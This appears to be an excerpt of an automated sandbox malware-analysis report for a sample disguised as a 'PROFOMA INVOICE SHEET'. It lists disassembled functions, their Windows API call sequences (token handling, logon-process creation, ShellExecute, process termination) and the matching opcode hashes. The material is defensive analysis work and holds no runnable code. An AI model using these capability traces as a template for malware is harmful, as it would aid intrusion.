                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                    • String ID: .lnk
                                    • API String ID: 3172280962-24824748
                                    • Opcode ID: e7c11a52cc589efe7cbea670c34f1057a7fa9c7849e32946ff0747341945eeef
                                    • Instruction ID: 139319dd2cc5c0778c2109e90c8f017858ca29e0395ca499f194aca810d5361c
                                    • Opcode Fuzzy Hash: e7c11a52cc589efe7cbea670c34f1057a7fa9c7849e32946ff0747341945eeef
                                    • Instruction Fuzzy Hash: 89D176706047019FC72ADF24C490A2ABBE5FF8A710F15885DF8899B3A1D775EC45CB92
                                    APIs
                                      • Part of subcall function 00360FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00360FCA
                                      • Part of subcall function 00360FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00360FD6
                                      • Part of subcall function 00360FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00360FE5
                                      • Part of subcall function 00360FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00360FEC
                                      • Part of subcall function 00360FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00361002
                                    • GetLengthSid.ADVAPI32(?,00000000,00361335), ref: 003617AE
                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 003617BA
                                    • HeapAlloc.KERNEL32(00000000), ref: 003617C1
                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 003617DA
                                    • GetProcessHeap.KERNEL32(00000000,00000000,00361335), ref: 003617EE
                                    • HeapFree.KERNEL32(00000000), ref: 003617F5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                    • String ID:
                                    • API String ID: 3008561057-0
                                    • Opcode ID: 37e9bfaca8af96683b6af39333f4f8ef42456f6cea1869577d99c429774f678c
                                    • Instruction ID: 002652351be3d44ecd3ffeff0623cbf6c6eef50646f44946d9bc455384392a14
                                    • Opcode Fuzzy Hash: 37e9bfaca8af96683b6af39333f4f8ef42456f6cea1869577d99c429774f678c
                                    • Instruction Fuzzy Hash: 6411D031510205FFDB229FA8CC49BAF7BBDEF41355F188019F44197214D736AA40CB60
                                    APIs
                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 003614FF
                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00361506
                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00361515
                                    • CloseHandle.KERNEL32(00000004), ref: 00361520
                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0036154F
                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 00361563
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                    • String ID:
                                    • API String ID: 1413079979-0
                                    • Opcode ID: 5d133abc3a22076244cfe3f07d8e9857f213b67b2b57cee15cc90db85f91a10c
                                    • Instruction ID: c55cbc950b8b746ac4cfd90793ff9f4b021aa67f90515329b8d20aca34c8e0c5
                                    • Opcode Fuzzy Hash: 5d133abc3a22076244cfe3f07d8e9857f213b67b2b57cee15cc90db85f91a10c
                                    • Instruction Fuzzy Hash: 7C115972501209AFDF129FA8EE49BDE7BADEF48744F098015FA05A2160C376CE60DB60
                                    APIs
                                    • GetLastError.KERNEL32(?,?,00323379,00322FE5), ref: 00323390
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0032339E
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003233B7
                                    • SetLastError.KERNEL32(00000000,?,00323379,00322FE5), ref: 00323409
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ErrorLastValue___vcrt_
                                    • String ID:
                                    • API String ID: 3852720340-0
                                    • Opcode ID: c4af2f474d050cf23ad8f783dcb0ceacb7774eca251d420680ee566534f143d2
                                    • Instruction ID: 6fcea96650d91c5aa6df2f541919886e32c2369e32958264c15107527485f813
                                    • Opcode Fuzzy Hash: c4af2f474d050cf23ad8f783dcb0ceacb7774eca251d420680ee566534f143d2
                                    • Instruction Fuzzy Hash: 81014737319331BEEA2737757CC5A672A9CEB05779B20022AF510C91F0EF2AAE035644
                                    APIs
                                    • GetLastError.KERNEL32(?,?,00335686,00343CD6,?,00000000,?,00335B6A,?,?,?,?,?,0032E6D1,?,003C8A48), ref: 00332D78
                                    • _free.LIBCMT ref: 00332DAB
                                    • _free.LIBCMT ref: 00332DD3
                                    • SetLastError.KERNEL32(00000000,?,?,?,?,0032E6D1,?,003C8A48,00000010,00304F4A,?,?,00000000,00343CD6), ref: 00332DE0
                                    • SetLastError.KERNEL32(00000000,?,?,?,?,0032E6D1,?,003C8A48,00000010,00304F4A,?,?,00000000,00343CD6), ref: 00332DEC
                                    • _abort.LIBCMT ref: 00332DF2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ErrorLast$_free$_abort
                                    • String ID:
                                    • API String ID: 3160817290-0
                                    • Opcode ID: dfead653700000f86da73f22154236ca6717a70f848b61c7ea2c45035ef242d5
                                    • Instruction ID: ec24b4a27d21f92f7136c2570cc16f41aad9b014460b59df7e243de6adafa536
                                    • Opcode Fuzzy Hash: dfead653700000f86da73f22154236ca6717a70f848b61c7ea2c45035ef242d5
                                    • Instruction Fuzzy Hash: 0FF0F636545A106BC6233739BCCAF5F265DAFC27A1F264419F838DA1E2EF3998025260
                                    APIs
                                      • Part of subcall function 00319639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00319693
                                      • Part of subcall function 00319639: SelectObject.GDI32(?,00000000), ref: 003196A2
                                      • Part of subcall function 00319639: BeginPath.GDI32(?), ref: 003196B9
                                      • Part of subcall function 00319639: SelectObject.GDI32(?,00000000), ref: 003196E2
                                    • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00398A4E
                                    • LineTo.GDI32(?,00000003,00000000), ref: 00398A62
                                    • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00398A70
                                    • LineTo.GDI32(?,00000000,00000003), ref: 00398A80
                                    • EndPath.GDI32(?), ref: 00398A90
                                    • StrokePath.GDI32(?), ref: 00398AA0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                    • String ID:
                                    • API String ID: 43455801-0
                                    • Opcode ID: 58ad557d3b8ec1e101c81177c65b579e53e73f8e30c76ba35bea2e76aa498110
                                    • Instruction ID: d477817803239df58424b196ac1a93de3ebf47c20d2efa287139efb0224c4252
                                    • Opcode Fuzzy Hash: 58ad557d3b8ec1e101c81177c65b579e53e73f8e30c76ba35bea2e76aa498110
                                    • Instruction Fuzzy Hash: 8F11C976040149FFEF129F94EC88EEA7F6DEB08354F048012FA199A1A1C7729D55DBA0
                                    APIs
                                    • GetDC.USER32(00000000), ref: 00365218
                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00365229
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00365230
                                    • ReleaseDC.USER32(00000000,00000000), ref: 00365238
                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0036524F
                                    • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00365261
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CapsDevice$Release
                                    • String ID:
                                    • API String ID: 1035833867-0
                                    • Opcode ID: 4baaec89c21f381a709ad493769a1ebc4250e27a54b2baee9e1e19048ef35edc
                                    • Instruction ID: 9288b83c3cf39c5e264178906d230e88f9e0a6a1bd4ca3cb16014c12d1a7d870
                                    • Opcode Fuzzy Hash: 4baaec89c21f381a709ad493769a1ebc4250e27a54b2baee9e1e19048ef35edc
                                    • Instruction Fuzzy Hash: 5F018F75A01708BBEB119BA5DC49E4EBFB8EB48351F044066FA04AB280D6719800CBA0
                                    APIs
                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00301BF4
                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00301BFC
                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00301C07
                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00301C12
                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00301C1A
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00301C22
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Virtual
                                    • String ID:
                                    • API String ID: 4278518827-0
                                    • Opcode ID: 20ebf93f0edd43f84704fcee88e72a12dd16710b0854bad1a06c0eb6fcd62d29
                                    • Instruction ID: de6b342ace89356609cd7eb4660f352acab50b705551c950e2fca53d8d9ba693
                                    • Opcode Fuzzy Hash: 20ebf93f0edd43f84704fcee88e72a12dd16710b0854bad1a06c0eb6fcd62d29
                                    • Instruction Fuzzy Hash: B00167B0902B5ABDE3008F6A8C85B52FFA8FF19354F04411BA15C4BA42C7F5AC64CBE5
                                    APIs
                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0036EB30
                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0036EB46
                                    • GetWindowThreadProcessId.USER32(?,?), ref: 0036EB55
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0036EB64
                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0036EB6E
                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0036EB75
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                    • String ID:
                                    • API String ID: 839392675-0
                                    • Opcode ID: 203ec7f9313137f7deb8372ad24b5da5f96df058f1aa89b6e238d7b99e2d9ca8
                                    • Instruction ID: eb0cfa2bb44d8dba305bc2bf73923d1e5a7c18330a074d99571f997a1fa723e5
                                    • Opcode Fuzzy Hash: 203ec7f9313137f7deb8372ad24b5da5f96df058f1aa89b6e238d7b99e2d9ca8
                                    • Instruction Fuzzy Hash: 6FF0BE72250118BBE7225B629C0EEEF7E7CEFCAB11F00115AF601D2090D7A21E01C6B8
                                    APIs
                                    • GetClientRect.USER32(?), ref: 00357452
                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 00357469
                                    • GetWindowDC.USER32(?), ref: 00357475
                                    • GetPixel.GDI32(00000000,?,?), ref: 00357484
                                    • ReleaseDC.USER32(?,00000000), ref: 00357496
                                    • GetSysColor.USER32(00000005), ref: 003574B0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                    • String ID:
                                    • API String ID: 272304278-0
                                    • Opcode ID: 80b0e67910098c2092270c3c8c38d5ef8c8cb6d3cb2b7d65abb12cdc3d0697a1
                                    • Instruction ID: b8116aee1210b9423e9ad066ee7406f3466d82263d9ad723da433a3ce300a9a2
                                    • Opcode Fuzzy Hash: 80b0e67910098c2092270c3c8c38d5ef8c8cb6d3cb2b7d65abb12cdc3d0697a1
                                    • Instruction Fuzzy Hash: 67018B31410205EFDB125FA5EC08BEA7BB9FB04312F551062FD16A20B0CB321E41EB10
                                    APIs
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0036187F
                                    • UnloadUserProfile.USERENV(?,?), ref: 0036188B
                                    • CloseHandle.KERNEL32(?), ref: 00361894
                                    • CloseHandle.KERNEL32(?), ref: 0036189C
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 003618A5
                                    • HeapFree.KERNEL32(00000000), ref: 003618AC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                    • String ID:
                                    • API String ID: 146765662-0
                                    • Opcode ID: 701a2045a2524d4dc3071942e9cf483a47c460e7cc400ffbf912b7b8b6e6caaa
                                    • Instruction ID: 8565e5ad3d6cdbc3188b0894951696f73dc66e5930760a5b112302eb20ebbaa8
                                    • Opcode Fuzzy Hash: 701a2045a2524d4dc3071942e9cf483a47c460e7cc400ffbf912b7b8b6e6caaa
                                    • Instruction Fuzzy Hash: 46E0C236014101BBDA026BA5EE0C90ABB2DFB49B22B109222F22581070CB339420DB64
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 0030BEB3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Init_thread_footer
                                    • String ID: D%=$D%=$D%=$D%=D%=
                                    • API String ID: 1385522511-2666785572
                                    • Opcode ID: 68aef81d6fedb8d0c56ff11bdbd20ee05c2c332ccdd801356c81e5ec63e6eb36
                                    • Instruction ID: 32ca8fe0aa32294e773165189976463882eb4ff70735c43d1ac000518ab6914a
                                    • Opcode Fuzzy Hash: 68aef81d6fedb8d0c56ff11bdbd20ee05c2c332ccdd801356c81e5ec63e6eb36
                                    • Instruction Fuzzy Hash: 66916B75A0120ACFCB19CF59D0A0AAAF7F6FF59310F25816AD941AB390D731ED81CB90
                                    APIs
                                      • Part of subcall function 00320242: EnterCriticalSection.KERNEL32(003D070C,003D1884,?,?,0031198B,003D2518,?,?,?,003012F9,00000000), ref: 0032024D
                                      • Part of subcall function 00320242: LeaveCriticalSection.KERNEL32(003D070C,?,0031198B,003D2518,?,?,?,003012F9,00000000), ref: 0032028A
                                      • Part of subcall function 00309CB3: _wcslen.LIBCMT ref: 00309CBD
                                      • Part of subcall function 003200A3: __onexit.LIBCMT ref: 003200A9
                                    • __Init_thread_footer.LIBCMT ref: 00387BFB
                                      • Part of subcall function 003201F8: EnterCriticalSection.KERNEL32(003D070C,?,?,00318747,003D2514), ref: 00320202
                                      • Part of subcall function 003201F8: LeaveCriticalSection.KERNEL32(003D070C,?,00318747,003D2514), ref: 00320235
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                    • String ID: +T5$5$G$Variable must be of type 'Object'.
                                    • API String ID: 535116098-1988379522
                                    • Opcode ID: 2cc40785f9cfd0c1da122aadc89031ef04b1c53f15d25484af9c48ed3df8d5da
                                    • Instruction ID: b4a8b0c75e7cdaa13f668147a3dab8d6b8d3d7632f01a324b40b1cc9965ad6ee
                                    • Opcode Fuzzy Hash: 2cc40785f9cfd0c1da122aadc89031ef04b1c53f15d25484af9c48ed3df8d5da
                                    • Instruction Fuzzy Hash: 5C916974A04309EFCB16EF54D8919ADB7B6FF49300F248099F806AB292DB71EE45CB51
                                    APIs
                                      • Part of subcall function 00307620: _wcslen.LIBCMT ref: 00307625
                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0036C6EE
                                    • _wcslen.LIBCMT ref: 0036C735
                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0036C79C
                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0036C7CA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ItemMenu$Info_wcslen$Default
                                    • String ID: 0
                                    • API String ID: 1227352736-4108050209
                                    • Opcode ID: 85f2389a78cc188e108bfeeece4e1a9ba58c03fc6907fda349ef68336b32d395
                                    • Instruction ID: 7af5cdea81c0aaf29f45c22f180bdfc8f08e3b3eb30e42354592c2f7eee82e5d
                                    • Opcode Fuzzy Hash: 85f2389a78cc188e108bfeeece4e1a9ba58c03fc6907fda349ef68336b32d395
                                    • Instruction Fuzzy Hash: AF51F0716243009FC7179F28D894A7B77E8AF49310F04AA2AF9E5D7195DB70D804CB96
                                    APIs
                                    • ShellExecuteExW.SHELL32(0000003C), ref: 0038AEA3
                                      • Part of subcall function 00307620: _wcslen.LIBCMT ref: 00307625
                                    • GetProcessId.KERNEL32(00000000), ref: 0038AF38
                                    • CloseHandle.KERNEL32(00000000), ref: 0038AF67
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CloseExecuteHandleProcessShell_wcslen
                                    • String ID: <$@
                                    • API String ID: 146682121-1426351568
                                    • Opcode ID: a3c42bf19e14f07efbafc4061442276277a2a9b0325e04591990feaff88d2db9
                                    • Instruction ID: a9ae9f90fce6a91523102a4df1407b823ccbea1b4182eb1ea471d74122779ae9
                                    • Opcode Fuzzy Hash: a3c42bf19e14f07efbafc4061442276277a2a9b0325e04591990feaff88d2db9
                                    • Instruction Fuzzy Hash: EE717970A00619DFDB16EF54C894A9EBBF0BF08310F05849AE816AF392CB35ED45CB91
                                    APIs
                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00367206
                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0036723C
                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0036724D
                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 003672CF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                    • String ID: DllGetClassObject
                                    • API String ID: 753597075-1075368562
                                    • Opcode ID: f7ef04d47b18c83126a6bdea0e4a4f98c2dcb5e6e36990bcdbe2ca5475176b04
                                    • Instruction ID: 65b166b90fabb71d5d9ff3086f96d4fa3ae4e567d62a4274f393663350c9d3ec
                                    • Opcode Fuzzy Hash: f7ef04d47b18c83126a6bdea0e4a4f98c2dcb5e6e36990bcdbe2ca5475176b04
